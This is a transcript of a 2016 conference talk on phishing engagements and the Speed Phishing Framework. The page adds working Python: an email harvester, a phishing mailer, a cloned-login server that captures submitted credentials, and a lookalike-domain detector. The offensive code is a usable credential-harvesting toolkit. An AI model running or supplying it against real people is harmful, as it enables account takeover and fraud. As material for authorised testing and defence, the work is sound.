HackCon - Phishing: Going from Recon to Creds - Adam Compton
TRANSCRIPT
Phishing: Going from Recon to Creds
Hackcon 2016 Edition
Adam Compton
Agenda
● Talk a Little About Myself
● What is Phishing?
● A Standard Phishing Process
● Speed Phishing Demo
https://github.com/tatanus/SPF
Adam Compton
Father - 5 yrs
Husband - 16 yrs
Security Researcher - 16 yrs
Programmer - 34 yrs
Hillbilly - 39 yrs
@tatanus
https://github.com/tatanus
http://blog.seedsofepiphany.com/
[email protected]
[email protected]
What is Phishing?
"the attempt to acquire sensitive information ... by masquerading as a trustworthy entity in an electronic communication." - Wikipedia (Phishing)
Why Phish?
Potential high return on investment
May be the easiest way onto a network
It works! People want to be helpful.
Going Back to the 90s
"AOHell includes a ''fisher'' that allows a user to pose as an AOL official and ask new members for passwords or credit-card numbers." - San Jose Mercury 1995
What kind of sensitive info?
Credentials
Credit Cards
Identity - PII
Health Information
Bitcoin Wallets
Steam Accounts
Types of Phishing Attacks

| Attack | Magnitude | Targeting |
|---|---|---|
| Phishing | Many | General |
| Spear Phishing | 10s - 100s | Group, Company |
| Whaling | One | Executive |
Standard Phishing Process
Reconnaissance
The list of targets and any other info that will help
Find them through the company site, Google searches, and even social media
The list may be provided by the customer
Recon Tools
Setup and Deploy
Setting up web, DNS and/or mail servers
Create a convincing scenario, write the email
Test the entire process! This may be your only chance to fix issues
Collect Responses & Post Exploitation
Credential Harvesting => Login Information
Exploiting Client => Metasploit Sessions
This step is based on the scope of work
Attack Tools - Setup to Post Compromise
Reports
Everyone's Favorite Part!
At Minimum:
• Describe the Attack Scenario
• Targets
• Collected Credentials or Compromised Systems
Include Statistics
I am lazy - Can we make this even easier?
Yes... Automation!
Program APIs
• BeEF RESTful API
• Recon-cli
• SET - seautomate
Parse Command Line Tool Output
Python, Perl, & Bash
Speed Phishing Framework - SPF
Automates common tasks needed to perform a phishing exercise
Written in Python
Minimal external dependencies
Current Features
Harvests Email Addresses
Sets up & Hosts Websites
Sends phishing emails to targets
Records Creds and Keystrokes
Creates a VERY Simple Report
SPF - Usage Statement / Options
SPF - Config File
SPF - Standard Phishing Process
SPF - Reconnaissance
Searches online search engines like:
◦ Google, Bing, and DuckDuckGo
Can use external tools such as theHarvester
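The recon step above (and the target-list step of the standard process) boils down to two things: pull addresses out of whatever the search engines and company site return, then use the naming convention those addresses reveal to guess addresses for people found on social media but never published. The following is an added example written for this page, not code from the talk or from SPF; the sample pages and the list of names are constructed, and the address patterns are the usual corporate conventions rather than anything SPF documents. Python is used because SPF itself is Python.

```python
import re
from html import unescape

# Constructed sample pages standing in for search-engine results and a
# company "contact us" page. Not real data.
SAMPLE_PAGES = [
    '<p>Contact <a href="mailto:jane.doe@example.com">Jane Doe</a> in sales.</p>',
    '<p>Press: john_smith@example.com, or jsmith@example.com (old alias)</p>',
    '<p>Partner contact: bob@partner.test, not in scope for this engagement</p>',
    '<span>alice.wong&#64;example.com</span> - Finance',   # HTML-entity obfuscated
    '<p>Jane.Doe@EXAMPLE.com</p>',                         # duplicate, different case
]

# Constructed list of names collected from LinkedIn / the company site.
KNOWN_PEOPLE = [("Jane", "Doe"), ("John", "Smith"), ("Alice", "Wong"), ("Carlos", "Ruiz")]

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Naming conventions to test; each maps (first, last) to a local part.
PATTERNS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "first_last": lambda f, l: f"{f}_{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "firstl":     lambda f, l: f"{f}{l[0]}",
    "first":      lambda f, l: f,
}


def harvest_emails(pages, domain):
    """Pull every address at `domain` out of raw HTML/text, lowercased and de-duplicated."""
    found = set()
    for page in pages:
        for addr in EMAIL_RE.findall(unescape(page)):   # unescape turns &#64; back into '@'
            addr = addr.lower()
            if addr.endswith("@" + domain.lower()):
                found.add(addr)
    return sorted(found)


def infer_pattern(emails, people):
    """Score each convention by how many known people it explains; None if no evidence."""
    local_parts = {e.split("@")[0] for e in emails}
    scores = {
        label: sum(1 for f, l in people if fmt(f.lower(), l.lower()) in local_parts)
        for label, fmt in PATTERNS.items()
    }
    best = max(scores, key=scores.get)
    return best if scores[best] > 0 else None


def generate_candidates(people, domain, pattern):
    """Guess an address for every known person using the inferred convention."""
    fmt = PATTERNS[pattern]
    return [f"{fmt(f.lower(), l.lower())}@{domain}" for f, l in people]


def build_target_list(pages, people, domain):
    """Harvested addresses plus pattern-based guesses, as one sorted list."""
    harvested = harvest_emails(pages, domain)
    pattern = infer_pattern(harvested, people)
    guesses = generate_candidates(people, domain, pattern) if pattern else []
    return sorted(set(harvested) | set(guesses))


if __name__ == "__main__":
    for target in build_target_list(SAMPLE_PAGES, KNOWN_PEOPLE, "example.com"):
        print(target)
```

Guessed addresses are only guesses: before they go into the send list, verify them (an SMTP RCPT TO probe against the target's MX, or simply keeping the bounce handling in place) so the report's statistics are not diluted by addresses that never existed.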
SPF - Identifying Potential Targets
SPF - Setup and Deploy
Built-in web server based on the Twisted Python library
Templated sample websites with accompanying email templates
Ability to dynamically clone additional login portals as needed
SPF - Loading Web Sites
SPF - Web Sites
SPF - Sending Emails
Can simulate sending of emails
Sends emails in a round-robin style, alternating across all phishing sites
Sends emails via a 3rd-party SMTP server or by connecting directly to the target's mail server
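The three sending behaviours listed above (a simulate mode, round-robin site assignment, and relay-versus-direct delivery) fit in a few dozen lines. What follows is an added example written for this page, not SPF's own mailer: the targets, phishing hosts and template are constructed, the per-recipient token in each link is this example's way of tying a later click or form post back to one target, and `resolve_mx` is a caller-supplied hook (for instance around dnspython) rather than anything SPF provides. In simulate mode no socket is ever opened.

```python
import secrets
import smtplib
from email.message import EmailMessage
from itertools import cycle

# Constructed targets, sites and template; none of these hosts exist.
TARGETS = ["jane.doe@example.com", "john.smith@example.com", "alice.wong@example.com"]
PHISH_SITES = ["http://webmail-example.test", "http://hr-portal-example.test"]
TEMPLATE = """Hi {first},

Our webmail system is being migrated this weekend. Please confirm your
account before Friday: {link}

IT Helpdesk
"""


def build_messages(targets, sites, sender, subject, template):
    """One message per target. Sites are assigned round robin, and each link
    carries a unique token so a click or a submission can be tied back to a recipient."""
    site_cycle = cycle(sites)
    batch = []
    for rcpt in targets:
        site = next(site_cycle)
        token = secrets.token_hex(4)
        first = rcpt.split("@")[0].split(".")[0].capitalize()
        msg = EmailMessage()
        msg["From"] = sender
        msg["To"] = rcpt
        msg["Subject"] = subject
        msg.set_content(template.format(first=first, link=f"{site}/?id={token}"))
        batch.append({"to": rcpt, "site": site, "token": token, "msg": msg})
    return batch


def send_batch(batch, simulate=True, smtp_host=None, smtp_port=25, resolve_mx=None):
    """simulate=True never opens a socket; it only records what would go out.
    Otherwise relay through smtp_host (a third-party SMTP server you control), or,
    if resolve_mx is given, deliver directly to each recipient's own mail server:
    resolve_mx(domain) must return that domain's MX hostname (hypothetical hook,
    e.g. wrapped around dnspython)."""
    results = []
    for item in batch:
        if simulate:
            results.append({"to": item["to"], "site": item["site"], "status": "simulated"})
            continue
        host = resolve_mx(item["to"].split("@", 1)[1]) if resolve_mx else smtp_host
        if not host:
            raise ValueError("need smtp_host or resolve_mx when not simulating")
        with smtplib.SMTP(host, smtp_port, timeout=30) as smtp:
            smtp.send_message(item["msg"])
        results.append({"to": item["to"], "site": item["site"], "status": "sent"})
    return results


if __name__ == "__main__":
    batch = build_messages(TARGETS, PHISH_SITES, "helpdesk@example-it.test",
                           "Webmail migration", TEMPLATE)
    for result in send_batch(batch, simulate=True):
        print(result)
```

Run it in simulate mode first and read every generated message: this is the "test the entire process" step from the standard process, and it is the only point at which a broken link or a wrong first name costs nothing.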
SPF - Sending Emails
SPF - Collect Responses & Post Exploitation
Logs all access to the websites
Logs all form submissions
Logs all keystrokes
Has the ability to pillage email accounts
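The hosting side of the Setup and Deploy step and the logging side of the slide above are one small web server: serve a cloned login page, write down every request (with the tracking id from the emailed link), capture every form post, and bounce the victim to the real site so nothing looks wrong. The following is an added example written for this page, not SPF's Twisted-based server: it uses only the standard library, the login page and the victim walkthrough are constructed, and the `id` query parameter is this example's tracking convention rather than SPF's. Keystroke capture is not shown; that needs JavaScript in the page.

```python
import http.client
import json
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed stand-in for a cloned login portal (not a real template).
LOGIN_PAGE = b"""<html><body><h2>Webmail</h2>
<form method="post" action="/login">
<input name="username"> <input name="password" type="password">
<input type="submit" value="Sign in"></form></body></html>"""


class PhishSite:
    """Serves a login page, logs every request, captures every form POST,
    then redirects the victim to the real site so nothing looks broken."""

    def __init__(self, redirect_to="https://webmail.example.com/"):
        self.access_log = []     # one entry per request (GET or POST)
        self.submissions = []    # one entry per form submission
        self.redirect_to = redirect_to
        self._server = None

    def _handler_class(self):
        site = self

        class Handler(BaseHTTPRequestHandler):
            def log_message(self, *args):   # keep the default stderr chatter quiet
                pass

            def _record(self):
                query = parse_qs(urlparse(self.path).query)
                site.access_log.append({
                    "ts": time.time(),
                    "ip": self.client_address[0],
                    "method": self.command,
                    "path": self.path,
                    "ua": self.headers.get("User-Agent", ""),
                    "tracking_id": query.get("id", [None])[0],  # ties the hit to one recipient
                })

            def do_GET(self):
                self._record()
                self.send_response(200)
                self.send_header("Content-Type", "text/html")
                self.end_headers()
                self.wfile.write(LOGIN_PAGE)

            def do_POST(self):
                self._record()
                length = int(self.headers.get("Content-Length", 0))
                form = parse_qs(self.rfile.read(length).decode(errors="replace"))
                site.submissions.append({k: v[0] for k, v in form.items()})
                self.send_response(302)
                self.send_header("Location", site.redirect_to)
                self.end_headers()

        return Handler

    def start(self, host="127.0.0.1", port=0):
        """Bind (port 0 = any free port) and serve in a background thread; returns the port."""
        self._server = ThreadingHTTPServer((host, port), self._handler_class())
        threading.Thread(target=self._server.serve_forever, daemon=True).start()
        return self._server.server_address[1]

    def stop(self):
        self._server.shutdown()
        self._server.server_close()

    def dump(self, path):
        """Write the evidence the report will need as JSON."""
        with open(path, "w") as fh:
            json.dump({"access": self.access_log, "submissions": self.submissions}, fh, indent=2)


def simulate_victim(port, tracking_id="t0001"):
    """Constructed walkthrough: one click on the emailed link, then one login attempt.
    http.client is used because it does not follow the final redirect."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", f"/?id={tracking_id}", headers={"User-Agent": "Mozilla/5.0 (constructed)"})
    conn.getresponse().read()
    body = urlencode({"username": "jane.doe", "password": "Winter2016!"})  # constructed creds
    conn.request("POST", f"/login?id={tracking_id}", body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


def run_demo():
    """Start a site, run the simulated victim, and return what was captured."""
    site = PhishSite()
    port = site.start()
    try:
        status = simulate_victim(port)
    finally:
        site.stop()
    return {"status": status, "access": site.access_log, "submissions": site.submissions}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Two things carry over to a real engagement: log before you respond, so a client that drops the connection is still counted, and keep the tracking id on the POST as well as the GET, otherwise a submission cannot be attributed to a recipient for the report.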
SPF - Collecting Results
Reports
Saves all data and activity logs to an assessment-specific directory structure
Generates a simple HTML report
SPF - Simple Report
Advanced/Experimental Features
Company Profiler
◦ Identify which, if any, templates should be used
◦ Dynamically generate new "target-specific" phishing sites
Pillage
◦ Verify credentials
◦ Download attachments
◦ Search for "SSN", "password", "login", etc.
SPF Demo
We shall all now pray to the demo gods
Future Work/Features
More external tools
Better Profiling/Pillaging
Fancy Reports
Incorporate SSL (possibly via https://letsencrypt.org/).
Suggestions?
A HUGE Thank You to:
Recon-ng - Tim Tomes (lanmaster53)
BeEF - Wade Alcorn
theHarvester - Christian Martorella
Social Engineering Toolkit - Dave Kennedy
Morning Catch - Raphael Mudge
Defense
Preparation
◦ User Awareness & Periodic Testing
Detection & Analysis
◦ Alerts, Mail Proxies
Containment, Eradication and Recovery
◦ Have a plan that is ready and tested
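The "Alerts, Mail Proxies" line is where a mail proxy can catch exactly the lure that a framework like the one in this talk produces: a sender or link on a domain one character away from the company's own, a link whose visible text is a URL on a different host than its href, and a Reply-To pointing somewhere other than the From domain. The following is an added example written for this page, not from the talk or any product: the protected-domain set, the sample message and the edit-distance threshold are assumptions to be tuned per environment, and the registrable-domain cut is deliberately crude (a public-suffix list would be the production choice).

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the organisation legitimately uses (assumed; tune per environment).
PROTECTED_DOMAINS = {"example.com"}

# Constructed inbound message, modelled on a credential-harvesting lure. Not real mail.
SAMPLE_MAIL = """From: IT Helpdesk <helpdesk@examp1e.com>
Reply-To: helpdesk@mail-recovery.test
To: jane.doe@example.com
Subject: Webmail migration
Content-Type: text/html

<html><body>
<p>Please confirm your account at
<a href="http://webmail.examp1e.com/?id=3f2a">https://webmail.example.com/</a></p>
<p>Questions? See <a href="https://intranet.example.com/help">our help page</a>.</p>
</body></html>
"""

ADDR_DOMAIN_RE = re.compile(r"@([\w.-]+)")


class LinkExtractor(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def levenshtein(a, b):
    """Edit distance; a small value between a link host and a protected domain is suspicious."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Crude registrable-domain cut (last two labels); a public-suffix list would be better."""
    return ".".join(host.lower().split(".")[-2:])


def is_lookalike(host, protected):
    reg = registrable(host)
    if not reg or reg in protected:
        return False
    return any(levenshtein(reg, p) <= 2 for p in protected)


def body_text(msg):
    for part in msg.walk():
        if part.get_content_type() in ("text/html", "text/plain"):
            raw = part.get_payload(decode=True) or b""
            return raw.decode(part.get_content_charset() or "utf-8", errors="replace")
    return ""


def analyze(raw_mail, protected=PROTECTED_DOMAINS):
    """Return (finding, detail) pairs; an empty list means nothing tripped."""
    msg = message_from_string(raw_mail)
    findings = []
    from_m = ADDR_DOMAIN_RE.search(msg.get("From", ""))
    reply_m = ADDR_DOMAIN_RE.search(msg.get("Reply-To", ""))
    if from_m and is_lookalike(from_m.group(1), protected):
        findings.append(("lookalike-sender", from_m.group(1)))
    if from_m and reply_m and registrable(reply_m.group(1)) != registrable(from_m.group(1)):
        findings.append(("reply-to-mismatch", reply_m.group(1)))
    extractor = LinkExtractor()
    extractor.feed(body_text(msg))
    for href, text in extractor.links:
        host = urlparse(href).hostname or ""
        if is_lookalike(host, protected):
            findings.append(("lookalike-link", host))
        shown = urlparse(text).hostname if text.startswith(("http://", "https://")) else None
        if shown and shown.lower() != host.lower():
            findings.append(("link-text-mismatch", f"{shown} -> {host}"))
    return findings


if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_MAIL):
        print(f"{kind}: {detail}")
```

Each finding is a candidate alert, not a verdict: legitimate mail from partners and SaaS vendors will trip the Reply-To and edit-distance checks, so feed the output into the analysis queue with an allowlist in front of it rather than blocking on it outright.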
Thank You!
411
Adam Compton
@tatanus
https://github.com/tatanus
http://blog.seedsofepiphany.com/
[email protected]
[email protected]